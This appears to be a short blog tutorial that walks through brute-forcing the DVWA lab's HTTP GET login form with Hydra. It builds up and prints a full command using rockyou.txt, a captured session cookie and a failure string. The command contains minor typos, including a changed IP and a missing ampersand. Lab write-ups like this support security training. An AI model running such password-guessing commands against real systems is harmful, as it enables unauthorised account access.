top of page
Ara

using Hydra on Login pages with a right method: dvwa training

  • hamidullahbayram
  • 9 May 2023
  • 2 dakikada okunur

Hydra as a password cracking tool benefits also for dictionary attacks. It performs on many protocols such as RDP, SSH, FTP and HTTP. In this article, we will walk through how to use Hydra to brute force HTTP GET login form, but the case is DVWA vulnmachine.

ree

Here is the login page to be BruteForced.

ree

There are two common ways to conduct brute force to the webpages: burp suite and hydra. The easy way is to use Intruder of BurpSuite, but it is not effective. I also came across a series of errors while using hydra as follows yet the given request is from BurpSuite which should be re-edited:

ree
ree

Since it is ordered with a right method depends on login form, it is easy to get the right credentials - if it exists in the given list :) -.


This is the list that can be followed combining the each pieces.

Username or user list -l -L

Password or password list -p -P

Http method (Post/Get)

IP address or hostname

Directory/Path to the Login Page

Request Body for Username/Password

Session cookie with H

A Way to Identify Failed Attempts


> specify a well-known username

-l admin

if the username is not clear, replace -l with -L providing a wordlist contains usernames.


> specify the password: we can use the common rockyou.txt which is already exist on Kali

- P /usr/share/wordlists/rockyou.txt


> specify the method, IP address to attack, and the path to the Login page

- http-get-form

- 192.168.28.140

- /dvwa/vulnerabilities/brute/

ree

> find the username/password inputs within request body of the form

- username=^USER^&password=^PASS^&Login=Login

ree

All are here, but have to be modified into Hydra command; e.g. replacing username with ^USER^ and password with ^PASS^ to make Hydra to try the words from our list in those positions.


> find the current session cookies

- H=Cookie:security=low; PHPSESSID=863ab4fe6ef3fa9588d31ce0e5f5a81c

ree

> specify failed attempt

- Username and/or password incorrect

ree

> now, it's time to execute the combined command

hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://192.168.28.14 /dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^Login=Login:H=Cookie:security=low;PHPSESSID=863ab4fe6ef3fa9588d31ce0e5f5a81c:Username and/or password incorrect'

ree






 
 
 

Yorumlar

bottom of page